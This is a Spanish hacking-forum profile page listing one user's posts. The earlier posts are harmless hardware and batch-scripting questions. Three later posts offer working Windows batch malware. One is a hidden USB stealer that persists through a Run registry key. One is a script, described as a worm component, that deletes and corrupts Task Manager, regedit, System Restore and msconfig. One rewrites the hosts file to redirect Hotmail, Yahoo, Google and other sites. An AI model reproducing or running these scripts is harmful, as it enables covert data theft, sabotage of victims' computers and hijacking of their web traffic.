elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Temas
Páginas: [1] 2
1  Informática / Hardware / Solución: Problemas de webcams y BSOD en: 30 Septiembre 2013, 15:33 pm
Hola muchachos. Hace poco me compré una nueva webcam para reemplazar a la antigua que llevaba tiempo usando en mi ordenador de sobremesa.

Poco después de instalarla cada vez que quería hacer una videoconferencia me tiraba una BSOD, y realmente es algo bastante molesto.

A raíz de aquello empecé a intentar buscar soluciones en Internet: en los foros de Microsoft, en foros de soporte técnico y en varios de informática general. Lo que saqué en claro es que aunque mi sistema operativo es W7 ese problema lo tenían desde XP hasta W8, y que las soluciones que daban, que generalmente era actualizar los drivers o instalar una versión anterior, o incluso restaurar el equipo a los valores de fábrica, a unos les funcionaban pero a otros no (a mí no me funcionaron, sino no estaría escribiendo este post).

Hasta que de casualidad encontré un comentario a pie de página en un blog que decía que las webcam que llevan micrófono incorporado instalan automáticamente el driver del micrófono y lo ponen en marcha sin solicitar confirmación incluso a pesar de que ya haya otra entrada de audio configurada.

Por eso si os veis en la misma situación que yo, en la que cada vez que intentáis grabar un vídeo con la cam hacer una videoconferencia os sale una pantalla azul mirad en el administrador de dispositivos a ver si el cacharro está usando sus drivers del micrófono al mismo tiempo que los que ya teníais antes en el equipo.



Desde que he deshabilitado el 'USB microphone' el ordenador ha dejado de tirarme BSOD y por fin he podido trabajar en paz con el Skype.

PD: He escrito este post porque hasta hace un momento no había conseguido arreglar mi problema con los pantallazos y en Internet apenas he encontrado información útil al respecto. Espero que a alguien más le sirva.
2  Seguridad Informática / Seguridad / Proyecto de creación de ordenador portátil ultraseguro en: 23 Junio 2012, 23:39 pm
Buenas a todos,

Con la llegada del verano y del tiempo libre me he propuesto el reto de coger un ordenador portátil y configurarle varias capas de seguridad para intentar hacerlo lo más inaccesible a terceros que sea capaz.

Es un proyecto que voy a iniciar como hobby y sin ningún fin en concreto, así que no tengo prisa (más bien al contrario, cuanto más tarde en acabarlo más tiempo me mantendré ocupado), así que probaré varias combinaciones. De todas maneras quería contar con la opinión de gente más experta en esta materia que yo (que apenas sé nada).

De momento lo que tengo anotado sobre el papel es lo siguiente:

1. Comprar un ordenador portátil nuevo para evitar que contenga información de usuarios anteriores. No necesariamente un portátil con unas grandes prestaciones, con uno de gama media-baja creo que sería suficiente.

2. Formatearlo e instalarle windows XP (que es el SO con el que más experiencia tengo) configurándole dos particiones: una para el SO y otra para almacenar archivos.

3. Configurar la BIOS para arrancar desde el HDD y no desde el CD-ROM. Configurarle además una contraseña a la BIOS para que el posible intruso lo tenga más difícil para cambiar lo anterior.

4. Cifrar el SO con TrueCrypt.

5. Configurar una contraseña de windows de más de 14 caracteres para evitar que un posible intruso se la saltase con ophcrack o similares (suponiendo que se hubiese podido saltar primero la pass del TrueCrypt).

8. Instalar en la partición del SO programas como TOR e incluir un programa que permita cambiar la dirección MAC del equipo.

7. Congelar la partición del SO con una versión reciente del DeepFreeze para evitar daños o espionaje por malware y también para evitar que se almacenen en el equipo datos de los usuarios como logs, cookies y demás huellas.

8. Cifrar completamente la partición destinada al almacenamiento de datos con TrueCrypt. Asimismo, no almacenar datos sin cifrar dentro de ella: es decir, guardarlos a su vez en sub-contenedores cifrados con TrueCrypt, CryptoExpert o similares. La ventaja de esto es que al acceder a la información no sería necesario descifrar toda la almacenada, sino solo la pequeña porción de ella que sea necesaria, dejando al resto protegida en sus respectivos contenedores.

Había pensado también en usar la característica de windows que permite configurar un pen drive como una llave física sin la cual no es posible acceder al SO, pero después he pensado que prefiero que sería más un estorbo que otra cosa, y que prefiero que el ordenador sea autosuficiente y no dependa de nada más.

Sé que tanto nivel de seguridad es innecesario y además un engorro, pero con este proyecto no pretendo hacer un portátil cómodo de usar, lo que quiero es que en él se puedan guardar datos a prueba de bombas, así que después de todo lo anterior mis preguntas son:

1. ¿Qué más podría hacer para darle más seguridad al equipo?
2. ¿Alguna de las ideas que se me han ocurrido hasta ahora es tan simple de saltar que no merece la pena incluirla?
3. ¿Alguna de las ideas que se me han ocurrido se podría sustituir por otra más efectiva?
4. ¿Alguna otra sugerencia?
  :silbar:

Se agradecen todas las respuestas por adelantado  ;-)
3  Foros Generales / Foro Libre / Para los usuarios de ADV. en: 15 Diciembre 2010, 19:53 pm

Buenas a todos  ;-)

Para todos los que, como yo, sois usuarios de ADV, TQD y similares, he encontrado un estudio que al parecer ha hecho un usuario y lo ha colgado en un PDF en MegaUpload.

El estudio fue realizado por un usuario de esas páginas y explica que el sistema de moderación de posts (mensajes que se publican o no en la página) no sirve para nada.

El usuario en cuestión que hizo el estudio tenía un TQD publicado en el que hablaba de este estudio, pero sin dar datos, así que le mandé un mensaje privado y me respondió, hace un rato, pasándome el link y diciéndome que lo haría público en su comentario.

El link es este: http://www.megaupload.com/?d=03BGIG9S (creo que no violo ninguna regla poniéndola, porque el estudio está publicado bajo Creative Commons, pero si no se pueden poner links, por favor borradlo).

Es un PDF con seis páginas, bastante bien redactado (aunque hay datos estadísticos que no acabo de entender del todo de donde salen ni a qué se refieren) y que por lo menos a mí me ha dejado con la duda, sin saber qué pensar. Al menos me ha parecido bastante curioso que alguien haya dedicado el tiempo a hacer alg así, y quería publicarlo en el foro por si alguien más le quiere echar un ojo.

No puedo citar enlace a la fuente porque, que yo sepa, no se ha subido a ninguna página web, y no sé si está permitido que ponga el nombre del usuario que me pasó el link (por si se considera spam, o algo así). De todas maneras, el que siga esas páginas se habrá topado ya con el post en cuestión.

Un saludo!

PD: Es la primera vez que pongo enlaces a archivos de descargas y no sé si estoy incumpliendo alguna norma. El archivo es un PDF (que no es exe ni nada) y el autor me ha dado permiso para que lo distribuya libremente. De todas maneras, si estoy incumpliendo alguna norma, avisadme y quito el enlace.
4  Programación / Scripting / [BATCH] problema con código (solucionado) en: 26 Octubre 2009, 20:52 pm
Buenas a todos. Estoy intentando desarrollar una nueva herramienta para los ordenadores del trabajo, pero me he encontrado con un par de problemillas.

Lo que estoy intentando hacer es un código que haga una acción cada cierto tiempo después de ejecutarlo en un equipo. La idea es que cuando pasen por ejemplo 20 días, como en el ejemplo de abajo, muestre el mensaje por pantalla de que es conveniente hacer un backup de las bases de datos.

Lo que se me ha ocurrido para calcular el tiempo ha sido comparar la fecha de creación de un archivo (C:\marca.txt), que se cree la primera vez que se ejecute el programa, y comparar esa fecha con la del sistema. Ese código no me ha dado problemas para funcionar, compara bien las dos fechas.

Código:
@echo off
:recordador1
If not exist "C:\marca.txt" echo >C:\marca.txt & goto recordador2
cd /d "C:\"

call:datos marca.txt

:datos
set tmp=%~t1
set /a varanno=%date:~6,4%-%tmp:~6,4%
If %varanno% EQU 0 set /a varmes=%date:~3,2%-%tmp:~3,2%
If %varanno% EQU 1 set /a varmes=(%date:~3,2%+12)-%tmp:~3,2%
If %varanno% GEQ 2 goto:tiempo1
If %varmes% EQU 0 set /a vardia=%date:~0,2%-%tmp:~0,2%
If %varmes% EQU 1 set /a vardia=(%date:~0,2%+30)-%tmp:~0,2%
If %varmes% GEQ 2 goto:tiempo1
If %vardia% LSS 20 goto:recordador2
If %vardia% GEQ 20 goto:tiempo1

:tiempo1
echo   Ya han pasado 22 o más días.
echo   Por favor, haga un backup de las bases de datos.
del /q /f "C:\marca.txt" & echo >C:\marca.txt & goto recordador2

:recordador2
:: más código

Sin embargo, el código no funciona como debiera, no sé qué hago mal, pero da fallos al redireccionar a :tiempo y a :recordador2, y no sé qué le pasa.

Por otra parte, ¿hay alguna manera más eficiente para saber en qué fecha se empezó a usar el programa sin necesidad de crear un archivo externo y ver su fecha de creación, como he hecho yo? Porque mi método me parece algo tosco.

Gracias por adelantado.

5  Programación / Scripting / [batch] problema con variables y espacios[Solucionado] en: 10 Octubre 2009, 11:06 am
buenos días a todos

estoy intentando hacer una herramienta bastante simple en batch que abra una carpeta si se llama igual que el archivo bat que se esté ejecutando

para eso estoy usando el código:
Código:
If exist %~d0%~p0%~n0\ (start %~d0%~p0%~n0\) else (echo la carpeta no existe&pause>nul)

y funciona... excepto con aquellas rutas que tienen espacios, como C:\Documents and Settings, por ejemplo

creo que debe haber una solución, pero por más vueltas que le doy, no se la encuentro... ¿a alguien se le ocurre cómo podría solucionarse?

gracias por adelantado
6  Programación / Scripting / [Batch] obtener nombre de archivo (solucionado) en: 23 Junio 2009, 18:22 pm
Hola a todos,
necesito almacenar en una variable el nombre (sin ruta y sin extensión) del archivo que se esté ejecutando.

Es decir, si tengo un archivo que se llama "C:\Documents and Settings\archivo1.bat" y lo ejecuto, quiero que almacene en una variable la palabra "archivo1" para poder operar con ella más tarde (mostrarla por pantalla, etc).

He probado usando la variable %0 de diferentes maneras, pero no consigo que haga lo que quiero...  :-\

¿alguien podría echarme una mano con esto?
7  Programación / Scripting / [Batch] almacenar nombres de carpetas en variables (solucionado) en: 17 Junio 2009, 16:49 pm
buenas a todos

necesito hacer un fragmento de código en batch que busque los nombres de las carpetas (solo las carpetas, sin contar las subcarpetas), de la unidad que se le indique, y que almacene cada nombre en una variable para poder trabajar con ellas más adelante

después de pasarme un buen rato intentando hacerlo sin éxito al final me he quedado sin ideas, ¿a alguien se le ocurre algo?  :-\
8  Programación / Scripting / My USB Stealer en: 1 Octubre 2008, 18:26 pm
Hola a todos!

Hoy os traigo la plantilla de un código en batch cuya función es copiar el contenido de memorias externas a una carpeta del disco duro de manera automática.

La plantilla es:
Código
  1. ::Code pensado para detectar y copiar todo el contenido de un USB conectado al equipo.
  2. :: Construido en arquitectura on-demand (hay que ejecutar el programa para que realice la orden).
  3. :: Este sistema copia todos los archivos. Es posible adaptar el code para que copie solo archivos con un nombre y/o una extensión concreta.
  4.  
  5. @echo off
  6. If Exist C:\STOLEN (goto echeck) else (
  7. MD C:\STOLEN
  8. goto echeck
  9. )
  10.  
  11. :echeck
  12. ping -n 30 localhost
  13. if exist E:\ (goto existe) else (goto fcheck)
  14.  
  15. :fcheck
  16. ping -n 2 localhost
  17. if exist F:\ (goto existf) else (goto gcheck)
  18.  
  19. :gcheck
  20. ping -n 2 localhost
  21. if exist G:\ (goto existg) else (goto hcheck)
  22.  
  23. :hcheck
  24. ping -n 2 localhost
  25. if exist H:\ (goto existh) else (goto echeck)
  26.  
  27.  
  28. :existe
  29. ping -n 2 localhost
  30. xcopy E:\*.* C:\STOLEN\*.* /E /I
  31. (goto fcheck)
  32.  
  33.  
  34. :existf
  35. ping -n 2 localhost
  36. xcopy F:\*.* C:\STOLEN\*.* /E /I
  37. (goto gcheck)
  38.  
  39.  
  40. :existg
  41. xcopy G:\*.* C:\STOLEN\*.* /E /I
  42. ping -n 2 localhost
  43. (goto hcheck)
  44.  
  45.  
  46. :existh
  47. xcopy H:\*.* C:\STOLEN\*.* /E /I
  48. ping -n 2 localhost
  49. (goto echeck)
  50.  

Como podemos ver el código es bastante tosco. Esto es así porque está pensado para usarse como modelo de partida para otros códigos más específicos.
Por ejemplo, imaginemos que queremos que el programa copie un tipo de archivos concretos a una carpeta menos llamativa que C:\STOLEN, y que además queremos que lo haga siempre, sin necesidad de que nosotros ejecutemos el programa.
Pues partiendo del código anterior, con unas pequeñas modificaciones obtenemos un código como este:

Código
  1. ::Code pensado para detectar y copiar todo el contenido de un USB conectado al equipo.
  2. :: Construido en arquitectura always-on (una vez instalado, se ejecuta siempre).
  3. :: El tipo de archivos que va a copiar son JPG y BMP. Esto es configurable.
  4.  
  5. @echo off
  6.  
  7. If Exist "%PROGRAMFILES%\USB\spool.exe" (goto alpha) else (goto betha)
  8.  
  9. :betha
  10. MD "%PROGRAMFILES%\USB\"
  11. copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
  12. reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spool /d "%PROGRAMFILES%\USB\spool.exe" /f
  13. goto alpha
  14.  
  15. :alpha
  16. If Exist "%USERPROFILE%\USB\" (goto echeck) else (
  17. MD "%USERPROFILE%\USB\"
  18. goto echeck
  19. )
  20.  
  21. :echeck
  22. ping -n 30 localhost
  23. if exist E:\ (goto existe) else (goto fcheck)
  24.  
  25. :fcheck
  26. ping -n 2 localhost
  27. if exist F:\ (goto existf) else (goto gcheck)
  28.  
  29. :gcheck
  30. ping -n 2 localhost
  31. if exist G:\ (goto existg) else (goto hcheck)
  32.  
  33. :hcheck
  34. ping -n 2 localhost
  35. if exist H:\ (goto existh) else (goto echeck)
  36.  
  37.  
  38. :existe
  39. ping -n 2 localhost
  40. xcopy E:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
  41. xcopy E:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
  42. (goto fcheck)
  43.  
  44.  
  45. :existf
  46. ping -n 2 localhost
  47. xcopy F:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
  48. xcopy F:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
  49. (goto gcheck)
  50.  
  51.  
  52. :existg
  53. xcopy G:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
  54. xcopy G:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
  55. ping -n 2 localhost
  56. (goto hcheck)
  57.  
  58.  
  59. :existh
  60. xcopy H:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
  61. xcopy H:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
  62. ping -n 2 localhost
  63. (goto echeck)
  64.  

Aquí vemos que el programa se copiaría a la carpeta de Archivos de Programa, y crearía una clave en el registro que lo auto-iniciaría con windows, para evitar tener que andarlo ejecutando continuamente.
Además, los datos se copian a la carpeta %USERPROFILE%\USB\, que llama menos la atención que C:\STOLEN, obviamente  ::)

NOTA IMPORTANTE: Para que el programa funcione, es necesario compilarlo a .exe y dotarlo de la caracterísitca de ejecutarse en modo oculto.

Espero que este código os sea de utilidad a los que buscábais algo parecido (yo en su momento lo busqué), ya que así por lo menos no os arriesgáis a que el programa que os descargáis traiga "regalito". (Ventajas de conocer el código fuente  :rolleyes:)

Hasta otra!
9  Programación / Scripting / Código de restricción de seguridad en batch en: 14 Julio 2008, 17:47 pm
Buenas a todos!

ya publiqué anteriormente un par de codigos de batch que podían ser integrados dentro del código general de un gusano. En este post y en los próximos que publique iré ampliando los códigos que subí.

Este código en concreto se encarga de restringir la seguridad de un ordenador corriendo bajo Windows XP:

Código
  1. @echo off
  2.  
  3. del /Q /F %WINDIR%\System32\taskmgr.exe
  4. del /Q /F %WINDIR%\System32\tasklist.exe
  5. del /Q /F %WINDIR%\System32\regedt32.exe
  6. del /Q /F %WINDIR%\System32\wscui.cpl
  7. del /Q /F %WINDIR%\System32\command.com
  8. del /Q /F %WINDIR%\System32\restore\rstrui.exe
  9. del /Q /F %WINDIR%\System32\restore\srdiag.exe
  10. del /Q /F %WINDIR%\taskman.exe
  11. del /Q /F %WINDIR%\regedit.exe
  12. del /Q /F %WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe
  13.  
  14. echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
  15. echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
  16. echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
  17. echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
  18. echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
  19. echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
  20. echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
  21. echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
  22.  
  23. echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"
  24. echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"
  25. echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"
  26. echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"
  27.  
  28. echo %random%%random%%random%%random%>>"%WINDIR%\regedit"
  29. echo %random%%random%%random%%random%>>"%WINDIR%\regedit"
  30. echo %random%%random%%random%%random%>>"%WINDIR%\regedit"
  31.  
  32. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
  33. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
  34. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
  35. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
  36. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
  37. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
  38. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
  39.  
  40. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\srdiag.exe"
  41. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\srdiag.exe"
  42. echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\srdiag.exe"
  43.  
  44. echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"
  45. echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"
  46. echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"
  47. echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"
  48.  
  49. echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
  50. echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
  51. echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
  52. echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
  53. echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
  54.  
  55. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  56. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  57. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  58. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  59. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  60. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  61. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  62. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  63. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  64. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  65. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  66. echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
  67.  
  68. echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"
  69. echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"
  70. echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"
  71. echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"
  72.  
  73. echo %random%%random%%random%%random%>>"%WINDIR%\System32\regedt32.exe"
  74. echo %random%%random%%random%%random%>>"%WINDIR%\System32\regedt32.exe"
  75.  
  76. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  77. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  78. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  79. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  80. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  81. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  82. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  83. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  84. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  85. echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
  86. attrib +s +h +r "%WINDIR%\System32\cmd.com"

Hasta otra!
10  Programación / Scripting / Código de batch de restricción de I.Explorer en: 25 Junio 2008, 17:50 pm
Buenas a todos otra vez.

Visto el (poco) éxito que tuvo mi anterior aportación sobre el código de ataque a lsass para evitar que el PC pudiera ser apagado, me arriesgo a volver a quedarme solo ante esta nueva explicación tan apañada sobre cómo hacer el gracioso con el archivo de hosts.

Todos conocemos el típico truco de redireccionar a localhost (127.0.0.1) ciertas páginas de intertet para evitar que el usuario las pueda ver. [Claro claro... ¿quién no ha resistido la tentación de hacer esta  :rolleyes: inocente  :rolleyes: gamberrada para reirse un rato a costa de otro]

Pues bien, si hemos redireccionado alguna vez una página hacia localhost, ¿podríamos redireccionar una página web hacia OTRA página web asignándole a la dirección de la primera la IP de la segunda en el archivo de hosts?

Como probablemente los que no sepan de lo que hablo se hayan perdido, lo explicaré con un ejemplo práctico. (Y el que no sepa qué es el archivo de hosts que se vaya a la wikipedia).

Imaginemos que nuestra página 1 es google.es
La IP de google.es es 216.239.59.104

Ahora, como somos tan inocentes, escogemos como página 2 a zorritas.com
La IP de zorritas.com es 70.86.199.78

[Las IP's se determinan mediante ping en la línea de comandos]

Ahora imaginemos que queremos que al entrar en la página 1 nos redireccione a la página 2. (es decir, que en nuestro navegador pongamos google.es y nos mande, para nuestra grandísima sorpresa, a zorritas.com ¿qué gracia ehh? Seeh, que te lo hagan a ti  :xD).

En ese caso, la línea del archivo de hosts debería quedar así:

70.86.199.78   google.es

un código en batch capaz de hacerlo es el siguiente:

echo 70.86.199.78   google.es>>"%WINDIR%\System32\drivers\etc\hosts"
[como todos ya deberíamos saber, el archivo de hosts no tiene extensión...]

Por tanto, un verdadero restrictor sería:
Código
  1. @echo off
  2. echo #Critical system entries>>"%WINDIR%\System32\drivers\etc\hosts"
  3. echo 70.86.199.78 hotmail.com>>"%WINDIR%\System32\drivers\etc\hosts"
  4. echo 70.86.199.78 www.hotmail.com>>"%WINDIR%\System32\drivers\etc\hosts"
  5. echo 82.98.86.175 es.mail.yahoo.com>>"%WINDIR%\System32\drivers\etc\hosts"
  6. echo 82.98.86.175 yahoo.com>>"%WINDIR%\System32\drivers\etc\hosts"
  7. echo 72.232.130.44 terra.es>>"%WINDIR%\System32\drivers\etc\hosts"
  8. echo 72.232.130.44 www.terra.es>>"%WINDIR%\System32\drivers\etc\hosts"
  9. echo 66.199.187.181 google.es>>"%WINDIR%\System32\drivers\etc\hosts"
  10. echo 66.199.187.181 www.google.es>>"%WINDIR%\System32\drivers\etc\hosts"
  11. echo 217.113.244.80 google.com>>"%WINDIR%\System32\drivers\etc\hosts"
  12. echo 217.113.244.80 www.google.com>>"%WINDIR%\System32\drivers\etc\hosts"
  13. echo 72.232.197.82 elhacker.net>>"%WINDIR%\System32\drivers\etc\hosts"
  14. echo 72.232.197.82 www.elhacker.net>>"%WINDIR%\System32\drivers\etc\hosts"
  15. echo 64.255.172.50 fotolog.com>>"%WINDIR%\System32\drivers\etc\hosts"
  16. echo 64.255.172.50 www.fotolog.com>>"%WINDIR%\System32\drivers\etc\hosts"
  17. echo 64.255.172.50 youtube.com>>"%WINDIR%\System32\drivers\etc\hosts"
  18. echo 64.255.172.50 www.youtube.com>>"%WINDIR%\System32\drivers\etc\hosts"
  19. echo 208.73.212.12 tibia.com>>"%WINDIR%\System32\drivers\etc\hosts"
  20. echo 208.73.212.12 www.tibia.com>>"%WINDIR%\System32\drivers\etc\hosts"
  21. echo 216.34.131.135 jccm.es>>"%WINDIR%\System32\drivers\etc\hosts"
  22. echo 216.34.131.135 www.jccm.es>>"%WINDIR%\System32\drivers\etc\hosts"
  23. exit
  24.  

Venga, sed buenos y no lo uséis para amargarle el día a vuestra exnovia.

Sobra decir que no me responasbilizo de lo que hagáis con el código. De hecho, sería un poco surrealista que le dijérais al juez: "Señor juez, es que fulanito se responsabilizaba de que yo le jodiera el ordenador a mi hermano...". No, la verdad es que no cuela  :xD
A sí que ya sabéis... bajo vuestra entera responsabilidad.

Hasta otra!
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines